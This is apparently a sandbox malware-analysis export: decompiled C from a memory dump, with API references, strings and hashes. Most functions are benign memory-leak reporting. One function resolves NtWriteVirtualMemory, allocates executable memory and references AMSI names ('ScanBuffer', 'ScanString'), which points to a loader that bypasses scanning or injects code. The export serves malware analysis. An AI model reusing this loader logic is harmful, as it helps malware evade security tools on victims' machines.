					do {
						L4:
						_t194 =  *(_t131 - 4);
						__eflags = _t194 & 0x00000001;
						if((_t194 & 0x00000001) == 0) {
							__eflags = _t194 & 0x00000004;
							if(__eflags == 0) {
								__eflags = _v112652 - 0x1000;
								if(_v112652 < 0x1000) {
									_v112664 = (_t194 & 0xfffffff0) - 4;
									_t126 = E032A238C(_t131);
									__eflags = _t126;
									if(_t126 == 0) {
										_v112645 = 0;
										 *((intOrPtr*)(_t197 + _v112652 * 4 - 0x1f828)) = _v112664;
										_t18 =  &_v112652;
										 *_t18 = _v112652 + 1;
										__eflags =  *_t18;
									}
								}
							} else {
								E032A23E4(_t131, __eflags, _t197);
							}
						}
						_t79 = E032A2024(_t131);
						_t131 = _t79;
						__eflags = _t131;
					} while (_t131 != 0);
					goto L11;
				}
				_t132 =  *0x32dd7b0; // 0x7f7f0000
				while(_t132 != 0x32dd7ac && _v112652 < 0x1000) {
					_t79 = E032A238C(_t132 + 0x10);
					__eflags = _t79;
					if(_t79 == 0) {
						_v112645 = 0;
						_t22 = _t132 + 0xc; // 0xd0004
						_t79 = _v112652;
						 *((intOrPtr*)(_t197 + _t79 * 4 - 0x1f828)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4;
						_t27 =  &_v112652;
						 *_t27 = _v112652 + 1;
						__eflags =  *_t27;
					}
					_t29 = _t132 + 4; // 0x7f8c0000
					_t132 =  *_t29;
				}
				if(_v112645 != 0) {
					L48:
					return _t79;
				}
				_v112653 = 0;
				_v112668 = 0;
				_t134 = E032A21E0(0x28,  &_v161836);
				_v112660 = 0x37;
				_v112680 = 0x32c9042;
				_v112684 =  &_v110600;
				do {
					_v112672 = ( *_v112680 & 0x0000ffff) - 4;
					_v112654 = 0;
					_t182 = 0xff;
					_t188 = _v112684;
					while(_t134 <=  &_v131117) {
						if( *_t188 > 0) {
							if(_v112653 == 0) {
								_t134 = E032A21E0(0x27, _t134);
								_v112653 = 1;
							}
							if(_v112654 != 0) {
								 *_t134 = 0x2c;
								_t139 = _t134 + 1;
								 *_t139 = 0x20;
								_t140 = _t139 + 1;
								__eflags = _t139 + 1;
							} else {
								 *_t134 = 0xd;
								 *((char*)(_t134 + 1)) = 0xa;
								_t147 = E032A20C4(_v112668 + 1, _t134 + 2);
								 *_t147 = 0x20;
								_t148 = _t147 + 1;
								 *_t148 = 0x2d;
								 *((char*)(_t148 + 1)) = 0x20;
								_t140 = E032A21E0(8, E032A20C4(_v112672, _t148 + 2));
								_v112654 = 1;
							}
							_t211 = _t182 - 1;
							if(_t211 < 0) {
								_t141 = E032A21E0(7, _t140);
							} else {
								if(_t211 == 0) {
									_t141 = E032A21E0(6, _t140);
								} else {
									E032A363C( *((intOrPtr*)(_t188 - 4)),  &_v162092);
									_t141 = E032A21E0(_v162092 & 0x000000ff, _t140);
								}
							}
							 *_t141 = 0x20;
							_t142 = _t141 + 1;
							 *_t142 = 0x78;
							 *((char*)(_t142 + 1)) = 0x20;
							_t134 = E032A20C4( *_t188, _t142 + 2);
						}
						_t182 = _t182 - 1;
						_t188 = _t188 - 8;
						if(_t182 != 0xffffffff) {
							continue;
						} else {
							goto L37;
						}
					}
					L37:
					_v112668 = _v112672;
					_v112684 = _v112684 + 0x800;
					_v112680 =  &(_v112680[0x10]);
					_t60 =  &_v112660;
					 *_t60 = _v112660 - 1;
				} while ( *_t60 != 0);
				if(_v112652 <= 0) {
					L47:
					E032A21E0(3, _t134);
					_t79 = MessageBoxA(0,  &_v161836, "Unexpected Memory Leak", 0x2010);
					goto L48;
				}
				if(_v112653 != 0) {
					 *_t134 = 0xd;
					_t136 = _t134 + 1;
					 *_t136 = 0xa;
					_t137 = _t136 + 1;
					 *_t137 = 0xd;
					_t138 = _t137 + 1;
					 *_t138 = 0xa;
					_t134 = _t138 + 1;
				}
				_t134 = E032A21E0(0x3c, _t134);
				_t184 = _v112652 - 1;
				if(_t184 >= 0) {
					_t185 = _t184 + 1;
					_v112676 = 0;
					_t189 =  &_v129068;
					L43:
					L43:
					if(_v112676 != 0) {
						 *_t134 = 0x2c;
						_t135 = _t134 + 1;
						 *_t135 = 0x20;
						_t134 = _t135 + 1;
					}
					_t134 = E032A20C4( *_t189, _t134);
					if(_t134 >  &_v131117) {
						goto L47;
					}
					_v112676 =  &(_v112676->i);
					_t189 = _t189 + 4;
					_t185 = _t185 - 1;
					if(_t185 != 0) {
						goto L43;
					}
				}
				L1:
				_t198 = _t198 + 0xfffff004;
				_push(_t73);
				_t73 = _t73 - 1;
				if(_t73 != 0) {
					goto L1;
				} else {
					E032A3098( &_v112644, 0x1b800);
					E032A3098( &_v129068, 0x4000);
					_t79 = 0;
					_v112652 = 0;
					_v112645 = 1;
					_t180 =  *0x32db70c; // 0x9200000
					goto L12;
				}
			}

0x032a2533
0x032a2534
0x032a2534
0x00000000
0x032a260f
0x032a258f
0x032a2594
0x032a2596
0x032a2598
0x032a260c
0x032a260c
0x00000000
0x00000000
0x00000000
0x00000000
0x032a259a
0x032a259a
0x032a259f
0x032a25a1
0x032a25a7
0x032a25a9
0x032a25af
0x032a25bc
0x032a25c6
0x032a25ce
0x032a25d6
0x032a25db
0x032a25dd
0x032a25df
0x032a25f2
0x032a25f9
0x032a25f9
0x032a25f9
0x032a25f9
0x032a25dd
0x032a25b1
0x032a25b4
0x032a25b9
0x032a25af
0x032a2601
0x032a2606
0x032a2608
0x032a2608
0x00000000
0x032a259a
0x032a261b
0x032a265a
0x032a2628
0x032a262d
0x032a262f
0x032a2631
0x032a2638
0x032a2644
0x032a264a
0x032a2651
0x032a2651
0x032a2651
0x032a2651
0x032a2657
0x032a2657
0x032a2657
0x032a2675
0x032a28d3
0x032a28d9
0x032a28d9
0x032a267b
0x032a2684
0x032a269f
0x032a26a1
0x032a26ab
0x032a26bb
0x032a26c1
0x032a26cd
0x032a26d3
0x032a26da
0x032a26e5
0x032a26e7
0x032a26f8
0x032a2705
0x032a2718
0x032a271a
0x032a271a
0x032a2728
0x032a2779
0x032a277c
0x032a277d
0x032a2780
0x032a2780
0x032a272a
0x032a272a
0x032a272e
0x032a2740
0x032a2742
0x032a2745
0x032a2746
0x032a274a
0x032a276e
0x032a2770
0x032a2770
0x032a2783
0x032a2786
0x032a279d
0x032a2788
0x032a2788
0x032a27b2
0x032a278a
0x032a27bf
0x032a27d8
0x032a27d8
0x032a2788
0x032a27da
0x032a27dd
0x032a27de
0x032a27e2
0x032a27ef
0x032a27ef
0x032a27f1
0x032a27f2
0x032a27f8
0x00000000
0x00000000
0x00000000
0x00000000
0x032a27f8
0x032a27fe
0x032a2804
0x032a280a
0x032a2814
0x032a281b
0x032a281b
0x032a281b
0x032a282e
0x032a28aa
0x032a28b6
0x032a28ce
0x00000000
0x032a28ce
0x032a2837
0x032a2839
0x032a283c
0x032a283d
0x032a2840
0x032a2841
0x032a2844
0x032a2845
0x032a2848
0x032a2848
0x032a285a
0x032a2862
0x032a2865
0x032a2867
0x032a2868
0x032a2872
0x00000000
0x032a2878
0x032a287f
0x032a2881
0x032a2884
0x032a2885
0x032a2888
0x032a2888
0x032a2892
0x032a289c
0x00000000
0x00000000
0x032a289e
0x032a28a4
0x032a28a7
0x032a28a8
0x00000000
0x00000000
0x032a28a8
0x032a2539
0x032a2539
0x032a253f
0x032a2540
0x032a2541
0x00000000
0x032a2543
0x032a255c
0x032a256e
0x032a2573
0x032a2575
0x032a257b
0x032a2582
0x00000000
0x032a2582

APIs

MessageBoxA.USER32 ref: 032A28CE

Strings

Unexpected Memory Leak, xrefs: 032A28C0
7, xrefs: 032A26A1
, xrefs: 032A2814
The unexpected small block leaks are:, xrefs: 032A2707
Unknown, xrefs: 032A278C
The sizes of unexpected leaked medium and large blocks are: , xrefs: 032A2849
An unexpected memory leak has occurred. , xrefs: 032A2690
bytes: , xrefs: 032A275D
String, xrefs: 032A27A1

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: d8c8088188939c6d9690fd3a0794fa85c8d9bf394aaddd904ff0f8279084f6d8
Instruction ID: 0adce69094c075ed683d2ab11ca8826009b85cb5c9fd654f7c1d7c006781b4ce
Opcode Fuzzy Hash: d8c8088188939c6d9690fd3a0794fa85c8d9bf394aaddd904ff0f8279084f6d8
Instruction Fuzzy Hash: 3CA1D634A24759CFDB21EA2CCC84B98B7F4EB09750F1448E5E549AB382CBB58AC5CF51

Uniqueness

Uniqueness Score: -1.00%

Function 032BA58C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E032BA58C(intOrPtr _a4, void* _a8) {
				void* _v8;
				struct HINSTANCE__* _v12;
				intOrPtr _v16;
				int _t23;
				void* _t49;
				void* _t51;
				void* _t52;

				_t51 = _a8;
				while(1) {
					_t23 = IsBadReadPtr(_t51, 0x14);
					if(_t23 != 0 ||  *((intOrPtr*)(_t51 + 0x10)) == 0 ||  *((intOrPtr*)(_t51 + 0xc)) == 0) {
						break;
					}
					_v8 =  *((intOrPtr*)(_t51 + 0xc)) + _a4;
					if(IsBadReadPtr(_v8, 4) != 0) {
						L13:
						_t51 = _t51 + 0x14;
						continue;
					}
					 *0x32de514 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\KernelBase.dll"), "LoadLibraryExA");
					_v12 =  *0x32de514(_v8, 0, 0);
					_t49 =  *((intOrPtr*)(_t51 + 0x10)) + _a4;
					_t52 = _t49;
					if( *((intOrPtr*)(_t51 + 4)) == 0xffffffff) {
						_t49 =  *_t51 + _a4;
					}
					while(IsBadReadPtr(_t49, 4) == 0 && IsBadReadPtr(_t52, 2) == 0 &&  *_t49 != 0) {
						if(E032B7A50(0, _t52, 4, 0x40, _v16) != 0) {
							if(( *(_t49 + 3) & 0x00000080) == 0) {
								 *_t52 = GetProcAddress(_v12, _a4 +  *_t49 + 2);
							} else {
								 *_t52 = GetProcAddress(_v12,  *_t49 & 0x0000ffff);
							}
							E032B7A50(0, _t52, 4, _v16, _v16);
						}
						_t49 = _t49 + 4;
						_t52 = _t52 + 4;
					}
					goto L13;
				}
				return _t23;
			}

0x032ba595
0x032ba674
0x032ba677
0x032ba67e
0x00000000
0x00000000
0x032ba5a3
0x032ba5b3
0x032ba671
0x032ba671
0x00000000
0x032ba671
0x032ba5ce
0x032ba5e1
0x032ba5e7
0x032ba5ea
0x032ba5f0
0x032ba5f4
0x032ba5f4
0x032ba654
0x032ba60b
0x032ba611
0x032ba63a
0x032ba613
0x032ba624
0x032ba624
0x032ba649
0x032ba649
0x032ba64e
0x032ba651
0x032ba651
0x00000000
0x032ba654
0x032ba696

APIs

IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 032BA5AC
GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 032BA5C3
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 032BA5C9
IsBadReadPtr.KERNEL32(?,00000004), ref: 032BA657
IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 032BA663
IsBadReadPtr.KERNEL32(?,00000014), ref: 032BA677

Strings

C:\Windows\System32\KernelBase.dll, xrefs: 032BA5BE
LoadLibraryExA, xrefs: 032BA5B9

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: Read$AddressHandleModuleProc
String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
API String ID: 1061262613-1650066521
Opcode ID: 28adaadefc33aa1c2b2f0c8d2f6fa05d975ff3750c8a4ca8d35e1fa2757cb452
Instruction ID: eb78e59f5ff4db8a5e73144e7bb3de859471c4c6e7779edaef01214e6d0580bd
Opcode Fuzzy Hash: 28adaadefc33aa1c2b2f0c8d2f6fa05d975ff3750c8a4ca8d35e1fa2757cb452
Instruction Fuzzy Hash: 433160B5A20305BFDF20DF68CC85F9A77B8AF05794F084154EA14AB281D3B4A9908B64

Uniqueness

Uniqueness Score: -1.00%

Function 032BC24C Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 420
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E032BC24C(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr _v104;
				char _v108;
				char _v112;
				char _v116;
				intOrPtr _v120;
				char _v124;
				char _v128;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				intOrPtr _v152;
				char _v156;
				char _v160;
				char _v164;
				intOrPtr _v168;
				char _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				char _v188;
				char _v192;
				char _v196;
				intOrPtr _v200;
				char _v204;
				char _v208;
				char _v212;
				intOrPtr _v216;
				char _v220;
				char _v224;
				char _v228;
				intOrPtr _v232;
				char _v236;
				char _v240;
				void* __ecx;
				_Unknown_base(*)()* _t168;
				signed int _t244;
				signed int _t276;
				_Unknown_base(*)()** _t279;
				intOrPtr _t345;
				void* _t368;
				void* _t373;
				void* _t378;
				_Unknown_base(*)()** _t379;
				void* _t384;
				void* _t389;
				void* _t394;
				void* _t399;
				void* _t404;
				void* _t409;
				void* _t414;
				void* _t419;
				void* _t424;
				intOrPtr _t425;
				void* _t431;
				void* _t436;
				void* _t438;
				void* _t440;
				intOrPtr _t442;
				intOrPtr _t443;

				_t442 = _t443;
				_t345 = 0x1d;
				do {
					_push(0);
					_push(0);
					_t345 = _t345 - 1;
					_t444 = _t345;
				} while (_t345 != 0);
				_t1 =  &_v8;
				 *_t1 = _t345;
				_v12 =  *_t1;
				_v8 = __edx;
				_t438 = __eax;
				_push(_t442);
				_push(0x32bc895);
				_push( *[fs:eax]);
				 *[fs:eax] = _t443;
				_push(0x32bc8b0);
				_push( *0x32de544);
				_push("OpenSession");
				E032A4824();
				E032A4698( &_v20, E032A4964(_v24));
				_push(_v20);
				E032A47B0( &_v32,  *0x32de544, 0x32bc8b0);
				E032A4698( &_v28, E032A4964(_v32));
				_pop(_t368);
				E032B7C04(_v28,  *0x32de544, _t368, _t444);
				_push(0x32bc8b0);
				_push( *0x32de544);
				_push("UacInitialize");
				E032A4824();
				E032A4698( &_v36, E032A4964(_v40));
				_push(_v36);
				E032A47B0( &_v48,  *0x32de544, 0x32bc8b0);
				E032A4698( &_v44, E032A4964(_v48));
				_pop(_t373);
				E032B7C04(_v44,  *0x32de544, _t373, _t444);
				_push(0x32bc8b0);
				_push( *0x32de544);
				_push("ScanBuffer");
				E032A4824();
				E032A4698( &_v52, E032A4964(_v56));
				_push(_v52);
				E032A47B0( &_v64,  *0x32de544, 0x32bc8b0);
				E032A4698( &_v60, E032A4964(_v64));
				_pop(_t378);
				E032B7C04(_v60,  *0x32de544, _t378, _t444);
				_t168 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtWriteVirtualMemory");
				_t379 =  *0x32da888; // 0x32de320
				 *_t379 = _t168;
				_push(0x32bc8b0);
				_push( *0x32de544);
				_push("UacInitialize");
				E032A4824();
				E032A4698( &_v68, E032A4964(_v72));
				_push(_v68);
				E032A47B0( &_v80,  *0x32de544, 0x32bc8b0);
				E032A4698( &_v76, E032A4964(_v80));
				_pop(_t384);
				E032B7C04(_v76,  *0x32de544, _t384, _t444);
				_push(0x32bc8b0);
				_push( *0x32de544);
				_push("OpenSession");
				E032A4824();
				E032A4698( &_v84, E032A4964(_v88));
				_push(_v84);
				E032A47B0( &_v96,  *0x32de544, 0x32bc8b0);
				E032A4698( &_v92, E032A4964(_v96));
				_pop(_t389);
				E032B7C04(_v92,  *0x32de544, _t389, _t444);
				_push(0x32bc8b0);
				_push( *0x32de544);
				_push("ScanBuffer");
				E032A4824();
				E032A4698( &_v100, E032A4964(_v104));
				_push(_v100);
				E032A47B0( &_v112,  *0x32de544, 0x32bc8b0);
				E032A4698( &_v108, E032A4964(_v112));
				_pop(_t394);
				E032B7C04(_v108,  *0x32de544, _t394, _t444);
				_t445 = _v8;
				if(_v8 != 0) {
					_push(0x32bc8b0);
					_push( *0x32de544);
					_push("ScanString");
					E032A4824();
					E032A4698( &_v116, E032A4964(_v120));
					_push(_v116);
					E032A47B0( &_v128,  *0x32de544, 0x32bc8b0);
					E032A4698( &_v124, E032A4964(_v128));
					_pop(_t436);
					E032B7C04(_v124,  *0x32de544, _t436, _t445);
				}
				_push(0x32bc8b0);
				_push( *0x32de544);
				_push("UacInitialize");
				E032A4824();
				E032A4698( &_v132, E032A4964(_v136));
				_push(_v132);
				E032A47B0( &_v144,  *0x32de544, 0x32bc8b0);
				E032A4698( &_v140, E032A4964(_v144));
				_pop(_t399);
				E032B7C04(_v140,  *0x32de544, _t399, _t445);
				_push(0x32bc8b0);
				_push( *0x32de544);
				_push("ScanBuffer");
				E032A4824();
				E032A4698( &_v148, E032A4964(_v152));
				_push(_v148);
				E032A47B0( &_v160,  *0x32de544, 0x32bc8b0);
				E032A4698( &_v156, E032A4964(_v160));
				_pop(_t404);
				E032B7C04(_v156,  *0x32de544, _t404, _t445);
				E032A2EE0();
				 *0x32de548 = (E032A2F08(9) + 1) * 0x5f5e100;
				_t244 =  *0x32de548; // 0x0
				_t440 = E032B79BC(_t438, 0, _t244 - _v12, 0x3000, 0x40);
				_t446 = _t440;
				if(_t440 != 0) {
					_push(0x32bc8b0);
					_push( *0x32de544);
					_push("UacInitialize");
					E032A4824();
					E032A4698( &_v164, E032A4964(_v168));
					_push(_v164);
					E032A47B0( &_v176,  *0x32de544, 0x32bc8b0);
					E032A4698( &_v172, E032A4964(_v176));
					_pop(_t431);
					E032B7C04(_v172,  *0x32de544, _t431, _t446);
				}
				_push(0x32bc8b0);
				_push( *0x32de544);
				_push("ScanBuffer");
				E032A4824();
				E032A4698( &_v180, E032A4964(_v184));
				_push(_v180);
				E032A47B0( &_v192,  *0x32de544, 0x32bc8b0);
				E032A4698( &_v188, E032A4964(_v192));
				_pop(_t409);
				E032B7C04(_v188,  *0x32de544, _t409, _t446);
				_push(0x32bc8b0);
				_push( *0x32de544);
				_push("OpenSession");
				E032A4824();
				E032A4698( &_v196, E032A4964(_v200));
				_push(_v196);
				E032A47B0( &_v208,  *0x32de544, 0x32bc8b0);
				E032A4698( &_v204, E032A4964(_v208));
				_pop(_t414);
				E032B7C04(_v204,  *0x32de544, _t414, _t446);
				_t276 =  *0x32de548; // 0x0
				_t279 =  *0x32da888; // 0x32de320
				 *( *_t279)(_t438, _t440, _v8, _t276 - _v12, _v16);
				_push(0x32bc8b0);
				_push( *0x32de544);
				_push("OpenSession");
				E032A4824();
				E032A4698( &_v212, E032A4964(_v216));
				_push(_v212);
				E032A47B0( &_v224,  *0x32de544, 0x32bc8b0);
				E032A4698( &_v220, E032A4964(_v224));
				_pop(_t419);
				E032B7C04(_v220,  *0x32de544, _t419, _t446);
				_push(0x32bc8b0);
				_push( *0x32de544);
				_push("ScanBuffer");
				E032A4824();
				E032A4698( &_v228, E032A4964(_v232));
				_push(_v228);
				E032A47B0( &_v240,  *0x32de544, 0x32bc8b0);
				E032A4698( &_v236, E032A4964(_v240));
				_pop(_t424);
				E032B7C04(_v236,  *0x32de544, _t424, _t446);
				_pop(_t425);
				 *[fs:eax] = _t425;
				_push(0x32bc89c);
				return E032A44C4( &_v240, 0x38);
			}

0x032bc24d
0x032bc250
0x032bc255
0x032bc255
0x032bc257
0x032bc259
0x032bc259
0x032bc259
0x032bc25c
0x032bc25c
0x032bc262
0x032bc265
0x032bc268
0x032bc271
0x032bc272
0x032bc277
0x032bc27a
0x032bc27d
0x032bc282
0x032bc284
0x032bc291
0x032bc2a3
0x032bc2ab
0x032bc2b6
0x032bc2c8
0x032bc2d0
0x032bc2d1
0x032bc2d6
0x032bc2db
0x032bc2dd
0x032bc2ea
0x032bc2fc
0x032bc304
0x032bc30f
0x032bc321
0x032bc329
0x032bc32a
0x032bc32f
0x032bc334
0x032bc336
0x032bc343
0x032bc355
0x032bc35d
0x032bc368
0x032bc37a
0x032bc382
0x032bc383
0x032bc398
0x032bc39d
0x032bc3a3
0x032bc3a5
0x032bc3aa
0x032bc3ac
0x032bc3b9
0x032bc3cb
0x032bc3d3
0x032bc3de
0x032bc3f0
0x032bc3f8
0x032bc3f9
0x032bc3fe
0x032bc403
0x032bc405
0x032bc412
0x032bc424
0x032bc42c
0x032bc437
0x032bc449
0x032bc451
0x032bc452
0x032bc457
0x032bc45c
0x032bc45e
0x032bc46b
0x032bc47d
0x032bc485
0x032bc490
0x032bc4a2
0x032bc4aa
0x032bc4ab
0x032bc4b0
0x032bc4b4
0x032bc4b6
0x032bc4bb
0x032bc4bd
0x032bc4ca
0x032bc4dc
0x032bc4e4
0x032bc4ef
0x032bc501
0x032bc509
0x032bc50a
0x032bc50a
0x032bc50f
0x032bc514
0x032bc516
0x032bc526
0x032bc53b
0x032bc543
0x032bc551
0x032bc569
0x032bc574
0x032bc575
0x032bc57a
0x032bc57f
0x032bc581
0x032bc591
0x032bc5a9
0x032bc5b4
0x032bc5c2
0x032bc5da
0x032bc5e5
0x032bc5e6
0x032bc5eb
0x032bc601
0x032bc60d
0x032bc61e
0x032bc620
0x032bc622
0x032bc624
0x032bc629
0x032bc62b
0x032bc63b
0x032bc653
0x032bc65e
0x032bc66c
0x032bc684
0x032bc68f
0x032bc690
0x032bc690
0x032bc695
0x032bc69a
0x032bc69c
0x032bc6ac
0x032bc6c4
0x032bc6cf
0x032bc6dd
0x032bc6f5
0x032bc700
0x032bc701
0x032bc706
0x032bc70b
0x032bc70d
0x032bc71d
0x032bc735
0x032bc740
0x032bc74e
0x032bc766
0x032bc771
0x032bc772
0x032bc77b
0x032bc78a
0x032bc791
0x032bc793
0x032bc798
0x032bc79a
0x032bc7aa
0x032bc7c2
0x032bc7cd
0x032bc7db
0x032bc7f3
0x032bc7fe
0x032bc7ff
0x032bc804
0x032bc809
0x032bc80b
0x032bc81b
0x032bc833
0x032bc83e
0x032bc84c
0x032bc864
0x032bc86f
0x032bc870
0x032bc879
0x032bc87c
0x032bc87f
0x032bc894

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanBuffer,032DE544,032BC8B0,UacInitialize,032DE544,032BC8B0,OpenSession,032DE544,032BC8B0,00000000,032BC895), ref: 032BC392
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032BC398

Part of subcall function 032B7C04: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,032B7CA2), ref: 032B7C3C
Part of subcall function 032B7C04: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,032B7CA2), ref: 032B7C4A
Part of subcall function 032B7C04: GetProcAddress.KERNEL32(74180000,00000000), ref: 032B7C63
Part of subcall function 032B7C04: FreeLibrary.KERNEL32(74180000,74180000,00000000,00000000,00000000,00000000,00000000,00000000,032B7CA2), ref: 032B7C82

Strings

NtWriteVirtualMemory, xrefs: 032BC388
ScanString, xrefs: 032BC4BD
C:\Windows\System32\ntdll.dll, xrefs: 032BC38D
OpenSession, xrefs: 032BC284, 032BC405, 032BC70D, 032BC79A
ScanBuffer, xrefs: 032BC336, 032BC45E, 032BC581, 032BC69C, 032BC80B
UacInitialize, xrefs: 032BC2DD, 032BC3AC, 032BC516, 032BC62B

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: AddressHandleLibraryModuleProc$FreeLoad
String ID: C:\Windows\System32\ntdll.dll$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize
API String ID: 232896157-171402031
Opcode ID: 9ee5ff5158a75bd1e9c101462eb14f89e35927c2a83224d854a116907a0be0a8
Instruction ID: e270451351a39702c8159026cde16adcd7c9da2522ec1d623588ad7fc19b9505
Opcode Fuzzy Hash: 9ee5ff5158a75bd1e9c101462eb14f89e35927c2a83224d854a116907a0be0a8
Instruction Fuzzy Hash: D1F10139A206689FDB11FBA9DC80BDEB3B9AF45700F1080A6D505AF315DBF0DE858B51

Uniqueness

Uniqueness Score: -1.00%

Function 032A252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E032A252E(void* __eax, void* __fp0) {
				void* _v8;
				char _v110600;
				char _v112644;
				char _v112645;
				signed int _v112652;
				char _v112653;
				char _v112654;
				char _v112660;
				intOrPtr _v112664;
				intOrPtr _v112668;
				intOrPtr _v112672;
				struct HWND__* _v112676;
				signed short* _v112680;
				intOrPtr* _v112684;
				char _v129068;
				char _v131117;
				char _v161836;
				void* _v162091;
				signed char _v162092;
				void* _t73;
				int _t79;
				signed int _t126;
				int _t131;
				intOrPtr _t132;
				char* _t134;
				char* _t135;
				char* _t136;
				char* _t137;
				char* _t138;
				char* _t139;
				char* _t141;
				char* _t142;
				char* _t147;
				char* _t148;
				intOrPtr _t180;
				void* _t182;
				void* _t184;
				void* _t185;
				intOrPtr* _t188;
				intOrPtr* _t189;
				signed int _t194;
				void* _t198;
				void* _t200;
				void* _t214;

				_t198 = _t200;
				_push(__eax);
				_t73 = 0x27;
				goto L2;
				L13:
				while(_t180 != 0x32db708) {
					_t79 = E032A2048(_t180);
					_t131 = _t79;
					__eflags = _t131;
					if(_t131 == 0) {
						L12:
						_t180 =  *((intOrPtr*)(_t180 + 4));
						continue;
					} else {
						goto L5;
					}
					do {
						L5:
						_t194 =  *(_t131 - 4);
						__eflags = _t194 & 0x00000001;
						if((_t194 & 0x00000001) == 0) {
							__eflags = _t194 & 0x00000004;
							if(__eflags == 0) {
								__eflags = _v112652 - 0x1000;
								if(_v112652 < 0x1000) {
									_v112664 = (_t194 & 0xfffffff0) - 4;
									_t126 = E032A238C(_t131);
									__eflags = _t126;
									if(_t126 == 0) {
										_v112645 = 0;
										 *((intOrPtr*)(_t198 + _v112652 * 4 - 0x1f828)) = _v112664;
										_t18 =  &_v112652;
										 *_t18 = _v112652 + 1;
										__eflags =  *_t18;
									}
								}
							} else {
								E032A23E4(_t131, __eflags, _t198);
							}
						}
						_t79 = E032A2024(_t131);
						_t131 = _t79;
						__eflags = _t131;
					} while (_t131 != 0);
					goto L12;
				}
				_t132 =  *0x32dd7b0; // 0x7f7f0000
				while(_t132 != 0x32dd7ac && _v112652 < 0x1000) {
					_t79 = E032A238C(_t132 + 0x10);
					__eflags = _t79;
					if(_t79 == 0) {
						_v112645 = 0;
						_t22 = _t132 + 0xc; // 0xd0004
						_t79 = _v112652;
						 *((intOrPtr*)(_t198 + _t79 * 4 - 0x1f828)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4;
						_t27 =  &_v112652;
						 *_t27 = _v112652 + 1;
						__eflags =  *_t27;
					}
					_t29 = _t132 + 4; // 0x7f8c0000
					_t132 =  *_t29;
				}
				if(_v112645 != 0) {
					L49:
					return _t79;
				}
				_v112653 = 0;
				_v112668 = 0;
				_t134 = E032A21E0(0x28,  &_v161836);
				_v112660 = 0x37;
				_v112680 = 0x32c9042;
				_v112684 =  &_v110600;
				do {
					_v112672 = ( *_v112680 & 0x0000ffff) - 4;
					_v112654 = 0;
					_t182 = 0xff;
					_t188 = _v112684;
					while(_t134 <=  &_v131117) {
						if( *_t188 > 0) {
							if(_v112653 == 0) {
								_t134 = E032A21E0(0x27, _t134);
								_v112653 = 1;
							}
							if(_v112654 != 0) {
								 *_t134 = 0x2c;
								_t139 = _t134 + 1;
								 *_t139 = 0x20;
								_t140 = _t139 + 1;
								__eflags = _t139 + 1;
							} else {
								 *_t134 = 0xd;
								 *((char*)(_t134 + 1)) = 0xa;
								_t147 = E032A20C4(_v112668 + 1, _t134 + 2);
								 *_t147 = 0x20;
								_t148 = _t147 + 1;
								 *_t148 = 0x2d;
